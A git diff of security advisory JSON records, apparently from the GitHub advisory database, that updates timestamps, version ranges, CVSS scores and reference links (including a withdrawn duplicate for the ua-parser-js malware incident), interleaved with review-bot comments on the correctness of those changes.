diff --git a/advisories/github-reviewed/2021/03/GHSA-5mg8-w23w-74h3/GHSA-5mg8-w23w-74h3.json b/advisories/github-reviewed/2021/03/GHSA-5mg8-w23w-74h3/GHSA-5mg8-w23w-74h3.json
index 1c32e88eef1cb..a20e6bc61de8e 100644
--- a/advisories/github-reviewed/2021/03/GHSA-5mg8-w23w-74h3/GHSA-5mg8-w23w-74h3.json
+++ b/advisories/github-reviewed/2021/03/GHSA-5mg8-w23w-74h3/GHSA-5mg8-w23w-74h3.json
@@ -1,13 +1,13 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-5mg8-w23w-74h3",
- "modified": "2023-08-18T15:56:36Z",
+ "modified": "2026-02-23T22:45:53Z",
 "published": "2021-03-25T17:04:19Z",
 "aliases": [
 "CVE-2020-8908"
 ],
 "summary": "Information Disclosure in Guava",
- "details": "A temp directory creation vulnerability exists in Guava prior to version 32.0.0 allowing an attacker with access to the machine to potentially access data in a temporary directory created by the Guava `com.google.common.io.Files.createTempDir()`. The permissions granted to the directory created default to the standard unix-like /tmp ones, leaving the files open. Maintainers recommend explicitly changing the permissions after the creation of the directory, or removing uses of the vulnerable method.\n",
+ "details": "A temp directory creation vulnerability exists in Guava prior to version 32.0.0 allowing an attacker with access to the machine to potentially access data in a temporary directory created by the Guava `com.google.common.io.Files.createTempDir()`. The permissions granted to the directory created default to the standard unix-like /tmp ones, leaving the files open. Maintainers recommend explicitly changing the permissions after the creation of the directory, or removing uses of the vulnerable method.",
 "severity": [
 {
 "type": "CVSS_V3",
diff --git a/advisories/github-reviewed/2021/10/GHSA-pjwm-rvh2-c87w/GHSA-pjwm-rvh2-c87w.json b/advisories/github-reviewed/2021/10/GHSA-pjwm-rvh2-c87w/GHSA-pjwm-rvh2-c87w.json
index 9ef5757001b98..b1da087ffa98d 100644
--- a/advisories/github-reviewed/2021/10/GHSA-pjwm-rvh2-c87w/GHSA-pjwm-rvh2-c87w.json
+++ b/advisories/github-reviewed/2021/10/GHSA-pjwm-rvh2-c87w/GHSA-pjwm-rvh2-c87w.json
@@ -1,9 +1,11 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-pjwm-rvh2-c87w",
- "modified": "2023-07-28T15:38:48Z",
+ "modified": "2026-02-17T21:57:43Z",
 "published": "2021-10-22T20:38:14Z",
- "aliases": [],
+ "aliases": [
+ "CVE-2021-4229"
+ ],
 "summary": "Embedded malware in ua-parser-js",
 "details": "The npm package `ua-parser-js` had three versions published with malicious code. Users of affected versions (0.7.29, 0.8.0, 1.0.0) should upgrade as soon as possible and check their systems for suspicious activity. See [this issue](https://github.com/faisalman/ua-parser-js/issues/536) for details as they unfold.\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.",
 "severity": [
diff --git a/advisories/github-reviewed/2022/02/GHSA-8v38-pw62-9cw2/GHSA-8v38-pw62-9cw2.json b/advisories/github-reviewed/2022/02/GHSA-8v38-pw62-9cw2/GHSA-8v38-pw62-9cw2.json
index 6386bf81eb90a..fb54a9073e854 100644
--- a/advisories/github-reviewed/2022/02/GHSA-8v38-pw62-9cw2/GHSA-8v38-pw62-9cw2.json
+++ b/advisories/github-reviewed/2022/02/GHSA-8v38-pw62-9cw2/GHSA-8v38-pw62-9cw2.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-8v38-pw62-9cw2",
- "modified": "2025-12-20T03:15:43Z",
+ "modified": "2026-02-20T19:56:16Z",
 "published": "2022-02-18T00:00:33Z",
 "aliases": [
 "CVE-2022-0639"
@@ -25,7 +25,7 @@
 "type": "ECOSYSTEM",
 "events": [
 {
- "introduced": "0"
+ "introduced": "1.0.0"
 },
 {
 "fixed": "1.5.7"
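Review bot: Narrowing `"introduced": "0"` to `"introduced": "1.0.0"` in the second GHSA-8v38-pw62-9cw2 hunk (and to `"0.1.0"` in the GHSA-rqff-837h-mm52 hunk that follows) drops every release older than the new lower bound out of the affected range, so a scanner would report such a version as unaffected. Neither hunk shows the package name or the reason for the new bound, so I cannot tell from here whether 1.0.0 and 0.1.0 are simply the first versions ever published or the versions that first contained the vulnerable code. If it is the former, `"introduced": "0"` was the safer encoding and the change buys nothing; if the latter, a reference entry pointing at the introducing commit, or a sentence in `details` naming it, would let a reader verify the bound. The `fixed` bounds (`1.5.7`, `1.5.6`) are untouched, so only the lower end of each range is affected.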
diff --git a/advisories/github-reviewed/2022/02/GHSA-rqff-837h-mm52/GHSA-rqff-837h-mm52.json b/advisories/github-reviewed/2022/02/GHSA-rqff-837h-mm52/GHSA-rqff-837h-mm52.json
index 90fa858d67a89..efd0a189e3e1a 100644
--- a/advisories/github-reviewed/2022/02/GHSA-rqff-837h-mm52/GHSA-rqff-837h-mm52.json
+++ b/advisories/github-reviewed/2022/02/GHSA-rqff-837h-mm52/GHSA-rqff-837h-mm52.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-rqff-837h-mm52",
- "modified": "2022-02-24T14:00:06Z",
+ "modified": "2026-02-20T19:56:07Z",
 "published": "2022-02-15T00:02:46Z",
 "aliases": [
 "CVE-2022-0512"
@@ -25,7 +25,7 @@
 "type": "ECOSYSTEM",
 "events": [
 {
- "introduced": "0"
+ "introduced": "0.1.0"
 },
 {
 "fixed": "1.5.6"
diff --git a/advisories/github-reviewed/2022/04/GHSA-gx7g-wjxg-jwwj/GHSA-gx7g-wjxg-jwwj.json b/advisories/github-reviewed/2022/04/GHSA-gx7g-wjxg-jwwj/GHSA-gx7g-wjxg-jwwj.json
index eaad37ba99926..d4b0769563ba5 100644
--- a/advisories/github-reviewed/2022/04/GHSA-gx7g-wjxg-jwwj/GHSA-gx7g-wjxg-jwwj.json
+++ b/advisories/github-reviewed/2022/04/GHSA-gx7g-wjxg-jwwj/GHSA-gx7g-wjxg-jwwj.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-gx7g-wjxg-jwwj",
- "modified": "2022-04-18T22:17:42Z",
+ "modified": "2026-02-18T23:33:34Z",
 "published": "2022-04-04T00:00:55Z",
 "aliases": [
 "CVE-2022-0088"
@@ -52,6 +52,10 @@
 "type": "WEB",
 "url": "https://github.com/yourls/yourls/commit/1de256d8694b0ec7d4df2ac1d5976d4055e09d59"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2022-0088.md"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/yourls/yourls"
diff --git a/advisories/github-reviewed/2022/05/GHSA-236c-vhj4-gfxg/GHSA-236c-vhj4-gfxg.json b/advisories/github-reviewed/2022/05/GHSA-236c-vhj4-gfxg/GHSA-236c-vhj4-gfxg.json
new file mode 100644
index 0000000000000..5e254e659881b
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-236c-vhj4-gfxg/GHSA-236c-vhj4-gfxg.json
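Review bot: The reference added in the GHSA-gx7g-wjxg-jwwj hunk, `https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2022-0088.md`, is a `blob/main` URL into a third-party personal repository, so the content a reader lands on can be rewritten or removed after this review without any trace in the advisory; the same applies to the GHSA-mg5h-rhjq-6v84 and GHSA-cp9c-phxx-55xm hunks further down. Advisory consumers surface these links directly to users, which makes a mutable, unaffiliated target a small trust liability compared with the upstream `yourls/yourls` commit and package links beside it. If the link is kept, pinning it to the revision that was actually reviewed (`blob/<COMMIT_SHA>/CVE-2022-0088.md`, with the real SHA substituted) makes the reference reproducible.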
@@ -0,0 +1,112 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-236c-vhj4-gfxg",
+ "modified": "2026-02-17T21:40:20Z",
+ "published": "2022-05-25T00:00:31Z",
+ "withdrawn": "2026-02-17T21:40:20Z",
+ "aliases": [],
+ "summary": "Duplicate Advisory: Embedded malware in ua-parser-js",
+ "details": "### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-pjwm-rvh2-c87w. This link is maintained to preserve external references.\n\n### Original Description\nA vulnerability was found in ua-parser-js 0.7.29/0.8.0/1.0.0. It has been rated as critical. This issue affects the crypto mining component which introduces a backdoor. Upgrading to version 0.7.30, 0.8.1 and 1.0.1 is able to address this issue. It is recommended to upgrade the affected component.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "ua-parser-js"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0.7.29"
+ },
+ {
+ "fixed": "0.7.30"
+ }
+ ]
+ }
+ ],
+ "versions": [
+ "0.7.29"
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "ua-parser-js"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0.8.0"
+ },
+ {
+ "fixed": "0.8.1"
+ }
+ ]
+ }
+ ],
+ "versions": [
+ "0.8.0"
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "ua-parser-js"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "1.0.0"
+ },
+ {
+ "fixed": "1.0.1"
+ }
+ ]
+ }
+ ],
+ "versions": [
+ "1.0.0"
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-4229"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/faisalman/ua-parser-js/issues/536"
+ },
+ {
+ "type": "ADVISORY",
+ "url": "https://github.com/advisories/GHSA-pjwm-rvh2-c87w"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.185453"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-829",
+ "CWE-912"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-17T21:40:20Z",
+ "nvd_published_at": "2022-05-24T16:15:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/10/GHSA-mg5h-rhjq-6v84/GHSA-mg5h-rhjq-6v84.json b/advisories/github-reviewed/2022/10/GHSA-mg5h-rhjq-6v84/GHSA-mg5h-rhjq-6v84.json
index d452d221466e0..2950526f06122 100644
--- a/advisories/github-reviewed/2022/10/GHSA-mg5h-rhjq-6v84/GHSA-mg5h-rhjq-6v84.json
+++ b/advisories/github-reviewed/2022/10/GHSA-mg5h-rhjq-6v84/GHSA-mg5h-rhjq-6v84.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-mg5h-rhjq-6v84",
- "modified": "2022-11-01T20:35:47Z",
+ "modified": "2026-02-18T23:33:51Z",
 "published": "2022-10-31T12:00:18Z",
 "aliases": [
 "CVE-2022-3766"
@@ -44,6 +44,10 @@
 "type": "WEB",
 "url": "https://github.com/thorsten/phpmyfaq/commit/c7904f2236c6c0dd64c2226b90c30af0f7e5a72d"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2022-3766.md"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/thorsten/phpmyfaq"
diff --git a/advisories/github-reviewed/2022/12/GHSA-cp9c-phxx-55xm/GHSA-cp9c-phxx-55xm.json b/advisories/github-reviewed/2022/12/GHSA-cp9c-phxx-55xm/GHSA-cp9c-phxx-55xm.json
index 3becc89af6f0e..38c97bebed5e5 100644
--- a/advisories/github-reviewed/2022/12/GHSA-cp9c-phxx-55xm/GHSA-cp9c-phxx-55xm.json
+++ b/advisories/github-reviewed/2022/12/GHSA-cp9c-phxx-55xm/GHSA-cp9c-phxx-55xm.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-cp9c-phxx-55xm",
- "modified": "2022-12-12T22:08:01Z",
+ "modified": "2026-02-18T23:34:01Z",
 "published": "2022-12-11T15:30:45Z",
 "aliases": [
 "CVE-2022-4407"
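Review bot: The new GHSA-236c-vhj4-gfxg file ends without a trailing newline (`\ No newline at end of file`), so the next edit to it will show a spurious change on the closing `}` line; a final newline after `}` avoids that. The record keeps `"aliases": []` even though its references include `https://nvd.nist.gov/vuln/detail/CVE-2021-4229`; since the GHSA-pjwm-rvh2-c87w hunk in this same commit adds that CVE to the canonical advisory, I read the empty list as deliberate so the CVE resolves to exactly one GHSA, but that cross-check is something the next reader has to repeat. Because the withdrawn record still carries three full `affected` ranges for `ua-parser-js`, a consumer that does not honour `withdrawn` would match it a second time alongside the canonical advisory; that is a consumer-side concern rather than something to change in this file.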
@@ -44,6 +44,10 @@
 "type": "WEB",
 "url": "https://github.com/thorsten/phpmyfaq/commit/1d73af34bf42764f9f9491c7ba5e9495d70e3ca5"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2022-4407.md"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/thorsten/phpmyfaq"
diff --git a/advisories/github-reviewed/2023/01/GHSA-qjm7-55vv-3c5f/GHSA-qjm7-55vv-3c5f.json b/advisories/github-reviewed/2023/01/GHSA-qjm7-55vv-3c5f/GHSA-qjm7-55vv-3c5f.json
index 8d3278ddb2d50..f6754d1003fb4 100644
--- a/advisories/github-reviewed/2023/01/GHSA-qjm7-55vv-3c5f/GHSA-qjm7-55vv-3c5f.json
+++ b/advisories/github-reviewed/2023/01/GHSA-qjm7-55vv-3c5f/GHSA-qjm7-55vv-3c5f.json
@@ -1,14 +1,19 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-qjm7-55vv-3c5f",
- "modified": "2023-01-20T23:35:16Z",
+ "modified": "2026-02-17T22:04:14Z",
 "published": "2023-01-18T03:31:17Z",
 "aliases": [
 "CVE-2018-25077"
 ],
 "summary": "mel-spintax has Inefficient Regular Expression Complexity",
 "details": "A vulnerability was found in melnaron mel-spintax. It has been rated as problematic. Affected by this issue is some unknown functionality of the file `lib/spintax.js`. The manipulation of the argument text leads to inefficient regular expression complexity. The name of the patch is 37767617846e27b87b63004e30216e8f919637d3. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-218456.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
+ }
+ ],
 "affected": [
 {
 "package": {
diff --git a/advisories/github-reviewed/2023/01/GHSA-vm74-j4wq-82xj/GHSA-vm74-j4wq-82xj.json b/advisories/github-reviewed/2023/01/GHSA-vm74-j4wq-82xj/GHSA-vm74-j4wq-82xj.json
index f9e33a67fda75..852c72f7cbb42 100644
--- a/advisories/github-reviewed/2023/01/GHSA-vm74-j4wq-82xj/GHSA-vm74-j4wq-82xj.json
+++ b/advisories/github-reviewed/2023/01/GHSA-vm74-j4wq-82xj/GHSA-vm74-j4wq-82xj.json
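Review bot: The GHSA-qjm7-55vv-3c5f hunk fills in `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L`, which computes to a 4.3 base score (the MODERATE band), but no hunk for this file touches `database_specific.severity`, so whatever qualitative severity the record already holds is not reconciled with the new vector; the GHSA-vm74-j4wq-82xj hunk below adds the identical vector with the same gap. The GHSA-g74q-5xw3-j7q9 change later in this commit does update `database_specific.severity` alongside its new vector, so these two look like the odd ones out. `database_specific` for both files lies outside the hunks shown, so I cannot confirm whether the stored value already reads `MODERATE`; if it does not, a second hunk setting `"severity": "MODERATE"` would keep the two fields consistent.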
@@ -1,14 +1,19 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-vm74-j4wq-82xj",
- "modified": "2024-03-01T14:28:55Z",
+ "modified": "2026-02-17T22:04:50Z",
 "published": "2023-01-17T21:30:22Z",
 "aliases": [
 "CVE-2022-4891"
 ],
 "summary": "Sisimai Inefficient Regular Expression Complexity vulnerability",
 "details": "A vulnerability has been found in Sisimai up to 4.25.14p11 and classified as problematic. This vulnerability affects the function `to_plain` of the file `lib/sisimai/string.rb`. The manipulation leads to inefficient regular expression complexity. The exploit has been disclosed to the public and may be used. Upgrading to version 4.25.14p12 is able to address this issue. The name of the patch is 51fe2e6521c9c02b421b383943dc9e4bbbe65d4e. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-218452.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
+ }
+ ],
 "affected": [
 {
 "package": {
diff --git a/advisories/github-reviewed/2024/02/GHSA-g74q-5xw3-j7q9/GHSA-g74q-5xw3-j7q9.json b/advisories/github-reviewed/2024/02/GHSA-g74q-5xw3-j7q9/GHSA-g74q-5xw3-j7q9.json
index 3ef93a9f6af83..5f7a7b4f87119 100644
--- a/advisories/github-reviewed/2024/02/GHSA-g74q-5xw3-j7q9/GHSA-g74q-5xw3-j7q9.json
+++ b/advisories/github-reviewed/2024/02/GHSA-g74q-5xw3-j7q9/GHSA-g74q-5xw3-j7q9.json
@@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-g74q-5xw3-j7q9", - "modified": "2024-03-19T18:00:01Z", + "modified": "2026-02-17T22:01:33Z", "published": "2024-02-13T19:49:43Z", "aliases": [ "CVE-2024-21386" ], "summary": "Microsoft Security Advisory CVE-2024-21386: .NET Denial of Service Vulnerability", "details": "# Microsoft Security Advisory CVE-2024-21386: .NET Denial of Service Vulnerability\n\n## Executive summary\n\nMicrosoft is releasing this security advisory to provide information about a vulnerability in ASP.NET 6.0, ASP.NET 7.0 and, ASP.NET 8.0 . This advisory also provides guidance on what developers can do to update their applications to address this vulnerability.\n\nA vulnerability exists in ASP.NET applications using SignalR where a malicious client can result in a denial-of-service.\n\n\n## Announcement\n\nAnnouncement for this issue can be found at https://github.com/dotnet/announcements/issues/295\n\n### Mitigation factors\n\nMicrosoft has not identified any mitigating factors for this vulnerability.\n\n## Affected software\n\n* Any .NET 6.0 application running on .NET 6.0.26 or earlier.\n* Any .NET 7.0 application running on .NET 7.0.15 or earlier.\n* Any .NET 8.0 application running on .NET 8.0.1 or earlier.\n\n## Affected Packages\nThe vulnerability affects any Microsoft .NET Core project if it uses any of affected packages versions listed below\n\n### ASP.NET 6.0\n\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[Microsoft.AspNetCore.App.Runtime.linux-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.linux-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm) | <= 6.0.26 | 
6.0.27\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.linux-musl-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-x64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.linux-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-x64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.osx-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-arm64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.osx-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-x64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x86) | <= 6.0.26 | 6.0.27\n\n\n\n### ASP.NET 7.0\n\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[Microsoft.AspNetCore.App.Runtime.linux-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.linux-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm) | <= 7.0.15 | 
7.0.16\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.linux-musl-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-x64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.linux-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-x64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.osx-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-arm64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.osx-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-x64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x86) | <= 7.0.15 | 7.0.16\n\n### ASP.NET 8.0\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[Microsoft.AspNetCore.App.Runtime.linux-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.linux-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm64) | <= 
8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.linux-musl-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-x64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.linux-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-x64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.osx-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-arm64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.osx-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-x64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x86) | <= 8.0.1 | 8.0.2\n\n## Advisory FAQ\n\n### How do I know if I am affected?\n\nIf you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-software) or [affected packages](#affected-packages) , you're exposed to the vulnerability.\n\n### How do I fix the issue?\n\n* To fix the issue please install the latest version of .NET 8.0 or .NET 7.0 or .NET 6.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs.\n* If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. 
You will see output like the following;\n\n```\n.NET Core SDK (reflecting any global.json):\n\n Version: 6.0.200\n Commit: 8473146e7d\n\nRuntime Environment:\n\n OS Name: Windows\n OS Version: 10.0.18363\n OS Platform: Windows\n RID: win10-x64\n Base Path: C:\\Program Files\\dotnet\\sdk\\6.0.300\\\n\nHost (useful for support):\n\n Version: 6.0.5\n Commit: 8473146e7d\n\n.NET Core SDKs installed:\n\n 6.0.200 [C:\\Program Files\\dotnet\\sdk]\n\n.NET Core runtimes installed:\n\n Microsoft.AspNetCore.App 6.0.5 [C:\\Program Files\\dotnet\\shared\\Microsoft.AspNetCore.App]\n Microsoft.NETCore.App 6.0.5 [C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App]\n Microsoft.WindowsDesktop.App 6.0.5 [C:\\Program Files\\dotnet\\shared\\Microsoft.WindowsDesktop.App]\n\nTo install additional .NET Core runtimes or SDKs:\n https://aka.ms/dotnet-download\n```\n\n* If you're using .NET 8.0, you should download and install .NET 8.0.2 Runtime or .NET 8.0.102 SDK (for Visual Studio 2022 v17.8) from https://dotnet.microsoft.com/download/dotnet-core/8.0.\n* If you're using .NET 7.0, you should download and install Runtime 7.0.16 or SDK 7.0.116 (for Visual Studio 2022 v17.4) from https://dotnet.microsoft.com/download/dotnet-core/7.0.\n* If you're using .NET 6.0, you should download and install Runtime 6.0.27 or SDK 6.0.419 from https://dotnet.microsoft.com/download/dotnet-core/6.0.\n\n.NET 6.0, .NET 7.0 and, .NET 8.0 updates are also available from Microsoft Update. 
To access this either type \"Check for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates.\n\nOnce you have installed the updated runtime or SDK, restart your apps for the update to take effect.\n\nAdditionally, if you've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed.\n\n## Other Information\n\n### Reporting Security Issues\n\nIf you have found a potential security issue in .NET 8.0 or .NET 7.0 or .NET 6.0, please email details to secure@microsoft.com. Reports may qualify for the Microsoft .NET Core & .NET 5 Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at .\n\n### Support\n\nYou can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime and https://github.com/dotnet/aspnet/. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue.\n\n### Disclaimer\n\nThe information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. 
Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\n\n### External Links\n\n[CVE-2024-21386]( https://www.cve.org/CVERecord?id=CVE-2024-21386)\n\n### Revisions\n\nV1.0 (February 13, 2024): Advisory published.\n\n_Version 1.0_\n\n_Last Updated 2024-02-13_",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
 "affected": [
 {
 "package": {
@@ -822,8 +827,10 @@
 }
 ],
 "database_specific": {
- "cwe_ids": [],
- "severity": "CRITICAL",
+ "cwe_ids": [
+ "CWE-400"
+ ],
+ "severity": "HIGH",
 "github_reviewed": true,
 "github_reviewed_at": "2024-02-13T19:49:43Z",
 "nvd_published_at": null
diff --git a/advisories/github-reviewed/2024/03/GHSA-3j27-563v-28wf/GHSA-3j27-563v-28wf.json b/advisories/github-reviewed/2024/03/GHSA-3j27-563v-28wf/GHSA-3j27-563v-28wf.json
index 7b894d7fc37d8..08bb6b80dafb3 100644
--- a/advisories/github-reviewed/2024/03/GHSA-3j27-563v-28wf/GHSA-3j27-563v-28wf.json
+++ b/advisories/github-reviewed/2024/03/GHSA-3j27-563v-28wf/GHSA-3j27-563v-28wf.json
